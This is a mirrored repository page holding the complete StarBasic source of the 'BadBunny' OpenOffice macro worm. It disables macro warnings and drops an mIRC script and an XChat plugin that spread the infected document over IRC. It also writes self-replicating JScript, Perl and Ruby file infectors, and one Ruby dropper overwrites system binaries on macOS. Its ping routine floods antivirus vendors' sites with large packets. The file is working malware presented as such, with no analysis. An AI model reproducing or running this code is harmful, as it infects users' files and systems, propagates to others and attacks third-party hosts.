mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
314 lines
11 KiB
Plaintext
314 lines
11 KiB
Plaintext
Dim Url As String
|
|
Dim myFileProp as Object
|
|
|
|
Sub badbunny()
|
|
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
|
|
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
|
|
mEventProps(0).Name = "EventType"
|
|
mEventProps(0).Value = "StarBasic"
|
|
mEventProps(1).Name = "Script"
|
|
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
|
|
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
|
|
ThisComponent.LockControllers
|
|
oDocument = ThisComponent
|
|
otext=oDocument.text
|
|
ocursor=otext.createtextcursor()
|
|
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
|
|
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
|
|
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
|
|
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
|
|
call ping
|
|
end sub
|
|
|
|
sub startgame
|
|
if GetGUIType =1 then 'windows
|
|
call win
|
|
end if
|
|
if GetGUIType =3 then 'MacOS
|
|
call mac
|
|
end if
|
|
if GetGUIType =4 then 'linux
|
|
call lin
|
|
end if
|
|
end sub
|
|
|
|
sub win
|
|
Dim dirz As String
|
|
Dim dummy()
|
|
Dim iVar As Integer
|
|
Dim Args(0) as new com.sun.star.beans.PropertyValue
|
|
Args(0).Name = "MacroExecutionMode"
|
|
Args(0).Value = _
|
|
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
|
|
ThisComponent.LockControllers
|
|
datei="c:\badbunny.odg"
|
|
dateiurl=converttourl(datei)
|
|
odoc=thisComponent
|
|
odoc.storeasurl(dateiurl,dummy())
|
|
dirz=Environ ("programfiles")
|
|
|
|
Open "c:\drop.bad" For Output As #1
|
|
Print #1, "[script]"
|
|
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
|
|
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
|
|
Print #1, "n2=on 1:start:{"
|
|
Print #1, "n3= /if $day == Friday { /echo }"
|
|
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
|
|
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
|
|
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
|
|
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
|
|
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
|
|
Print #1, "n9=on 1:part:#:{"
|
|
Print #1, "n10=set %M_E $me"
|
|
Print #1, "n11=set %NickName $nick"
|
|
Print #1, "n12=set %ccd .dcc"
|
|
Print #1, "n13= if %NickName != %M_E {"
|
|
Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
|
|
Print #1, "n15= /msg %NickName Be my bunny!"
|
|
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
|
|
Print #1, "n17= }"
|
|
Print #1, "n18=}"
|
|
Close #1
|
|
|
|
if ( Dir(dirz &"\mirc") <> "") then
|
|
Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
|
|
end if
|
|
if ( Dir("c:\mirc") <> "") then
|
|
Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
|
|
|
|
end if
|
|
if ( Dir(dirz &"\mirc32") <> "") then
|
|
Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
|
|
end if
|
|
if ( Dir("c:\mirc32") <> "") then
|
|
Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
|
|
end if
|
|
|
|
Open "c:\badbunny.js" For Output As #2
|
|
Print #2, "// BadBunny"
|
|
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
|
|
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
|
|
Print #2, "var OurCode=me.Read(1759)"
|
|
Print #2, "me.Close()"
|
|
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
|
|
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
|
|
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
|
|
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
|
|
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
|
|
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
|
|
Print #2, "{"
|
|
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
|
|
Print #2, "{"
|
|
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
|
|
Print #2, "var Marker=filez.Read(11)"
|
|
Print #2, "var allinone=Marker+filez.ReadAll()"
|
|
Print #2, "filez.Close()"
|
|
Print #2, "if(Marker!=""// BadBunny"")"
|
|
Print #2, "{"
|
|
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
|
|
Print #2, "filez.Write(OurCode+allinone)"
|
|
Print #2, "filez.Close()"
|
|
Print #2, "}"
|
|
Print #2, "}"
|
|
Print #2, "}"
|
|
Print #2, "function foundit()"
|
|
Print #2, "{"
|
|
Print #2, "fcodea=''; count=0; randon='';"
|
|
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
|
|
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
|
|
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
|
|
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
|
|
Print #2, "i+=fcodea.length;"
|
|
Print #2, "}"
|
|
Print #2, "//->"
|
|
Close #2
|
|
Shell("c:\badbunny.js",0)
|
|
oDoc.store()
|
|
End Sub
|
|
|
|
sub lin()
|
|
'xchat2worm part by WarGame
|
|
dim HomeDir as string
|
|
dim xchat2script as string
|
|
dim perlvir as string
|
|
dim cmd as string
|
|
dim WgeT as string
|
|
Dim dummy()
|
|
Dim iVar As Integer
|
|
Dim Args(0) as new com.sun.star.beans.PropertyValue
|
|
Args(0).Name = "MacroExecutionMode"
|
|
Args(0).Value = _
|
|
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
|
|
ThisComponent.LockControllers
|
|
datei="/tmp/badbunny.odg"
|
|
dateiurl=converttourl(datei)
|
|
odoc=thisComponent
|
|
odoc.storeasurl(dateiurl,dummy())
|
|
|
|
' get home dir
|
|
HomeDir = Environ("HOME")
|
|
|
|
'build the path of our xchat2 script
|
|
if HomeDir = "" then
|
|
' I could not get $HOME !
|
|
|
|
else
|
|
xchat2script = HomeDir & "/.xchat2/badbunny.py"
|
|
|
|
' drop the python script
|
|
Open xchat2script For Output As #1
|
|
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
|
|
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
|
|
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
|
|
print #1,"import xchat"
|
|
print #1,"def onkick_cb(word, word_eol, userdata):"
|
|
print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
|
|
print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
|
|
print #1," return xchat.EAT_NONE"
|
|
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
|
|
close #1
|
|
endif
|
|
|
|
'drop the perl virus
|
|
perlvir = HomeDir & "/BadBunny.pl"
|
|
open perlvir for output as #1
|
|
print #1,"#BadBunny"
|
|
print #1,"open(File,$0);@MyCode = ;close(File);"
|
|
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
|
|
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
|
|
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
|
|
close #1
|
|
cmd = "perl " & perlvir
|
|
shell(cmd,0)
|
|
|
|
oDoc.store()
|
|
end sub
|
|
|
|
sub mac()
|
|
Dim iVar As Integer
|
|
iVar = Int((15 * Rnd) -2)
|
|
Select Case iVar
|
|
Case 1 To 5
|
|
call one
|
|
Case 6, 7, 8
|
|
call two
|
|
Case Is > 8 And iVar < 11
|
|
call one
|
|
Case Else
|
|
call two
|
|
End Select
|
|
end sub
|
|
|
|
sub one ()
|
|
'thx to skyout
|
|
Open "badbunny.rb" For Output As #1
|
|
print #1,"#!/usr/bin/env ruby"
|
|
print #1,"require 'ftools'"
|
|
print #1,"def replacecmd(cmdname, dirpath)"
|
|
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
|
|
print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
|
|
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
|
|
print #1,"oldcmd.puts ""puts \""\"""
|
|
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
|
|
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
|
|
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
|
|
print #1,"oldcmd.puts ""puts \""\"""""
|
|
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
|
|
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
|
|
print #1,"oldcmd.puts ""sleep 1"""
|
|
print #1,"oldcmd.puts ""puts \""3\"""
|
|
print #1,"oldcmd.puts ""sleep 1"""
|
|
print #1,"oldcmd.puts ""puts \""2\"""
|
|
print #1,"oldcmd.puts ""sleep 1"""
|
|
print #1,"oldcmd.puts ""puts \""1\"""
|
|
print #1,"oldcmd.puts ""sleep 1"""
|
|
print #1,"oldcmd.puts ""puts \""\"""
|
|
print #1,"oldcmd.puts ""for $args in $* do"""
|
|
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
|
|
print #1,"oldcmd.puts ""end"""
|
|
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
|
|
print #1,"oldcmd.puts ""exit 0"""
|
|
print #1,"end"
|
|
print #1,"$binary_dirs = Array.new"
|
|
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
|
|
print #1,"for $dir in $binary_dirs do"
|
|
print #1,"if File.directory?($dir) then"
|
|
print #1,"if File.writable?($dir) then"
|
|
print #1,"Dir.open($dir).each do |file|"
|
|
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
|
|
print #1,"replacecmd(file, $dir)"
|
|
print #1,"end"
|
|
print #1,"end"
|
|
print #1,"end"
|
|
print #1,"end"
|
|
print #1,"exit 0"
|
|
close #1
|
|
Shell("badbunny.rb",0)
|
|
end sub
|
|
|
|
sub two() 'thx to SPTH for this...
|
|
Open "badbunnya.rb" For Output As #2
|
|
print #2,"# BADB"
|
|
print #2,"mycode="""
|
|
print #2,"mych=File.open(__FILE__)"
|
|
print #2,"myc=mych.read(1)"
|
|
print #2,"while myc!=nil"
|
|
print #2,"mycode+=myc"
|
|
print #2,"myc=mych.read(1)"
|
|
print #2,"end"
|
|
print #2,"mycode=mycode[mycode.length-734,734]"
|
|
print #2,"cdir = Dir.open(Dir.getwd)"
|
|
print #2,"cdir.each do |a|"
|
|
print #2,"if File.ftype(a)==""file"" then"
|
|
print #2,"if a[a.length-3, a.length]=="".rb"" then"
|
|
print #2,"if a!=File.basename(__FILE__) then"
|
|
print #2,"fcode="""
|
|
print #2,"fle=open(a)"
|
|
print #2,"badb=fle.read(1)"
|
|
print #2,"while badb!=nil"
|
|
print #2,"fcode+=badb"
|
|
print #2,"badb=fle.read(1)"
|
|
print #2,"end"
|
|
print #2,"fle.close"
|
|
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
|
|
print #2,"fcode=fcode+13.chr+10.chr+mycode"
|
|
print #2,"fle=open(a,""w"")"
|
|
print #2,"fle.print fcode"
|
|
print #2,"fle.close"
|
|
print #2,"end"
|
|
print #2,"end"
|
|
print #2,"end"
|
|
print #2,"end"
|
|
print #2,"end"
|
|
print #2,"cdir.close"
|
|
close #2
|
|
Shell("badbunnya.rb",0)
|
|
End Sub
|
|
|
|
sub ping()
|
|
Shell("ping -l 5000 -t www.ikarus.at",0)
|
|
Shell("ping -l 5000 -t www.aladdin.com",0)
|
|
Shell("ping -l 5000 -t www.norman.no",0)
|
|
Shell("ping -l 5000 -t www.norman.com",0)
|
|
Shell("ping -l 5000 -t www.kaspersky.com",0)
|
|
Shell("ping -l 5000 -t www.kaspersky.ru",0)
|
|
Shell("ping -l 5000 -t www.kaspersky.pl",0)
|
|
Shell("ping -l 5000 -t www.grisoft.cz",0)
|
|
Shell("ping -l 5000 -t www.symantec.com",0)
|
|
Shell("ping -l 5000 -t www.proantivirus.com",0)
|
|
Shell("ping -l 5000 -t www.f-secure.com",0)
|
|
Shell("ping -l 5000 -t www.sophos.com",0)
|
|
Shell("ping -l 5000 -t www.arcabit.pl",0)
|
|
Shell("ping -l 5000 -t www.arcabit.com",0)
|
|
Shell("ping -l 5000 -t www.avira.com",0)
|
|
Shell("ping -l 5000 -t www.avira.de",0)
|
|
Shell("ping -l 5000 -t www.avira.ro",0)
|
|
Shell("ping -l 5000 -t www.avast.com",0)
|
|
Shell("ping -l 5000 -t www.virusbuster.hu",0)
|
|
Shell("ping -l 5000 -t www.trendmicro.com",0)
|
|
Shell("ping -l 5000 -t www.bitdefender.com",0)
|
|
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
|
|
Shell("ping -l 5000 -t www.drweb.com",0)
|
|
Shell("ping -l 5000 -t www.drweb.ru",0)
|
|
Shell("ping -l 5000 -t www.viruslist.com",0)
|
|
end sub |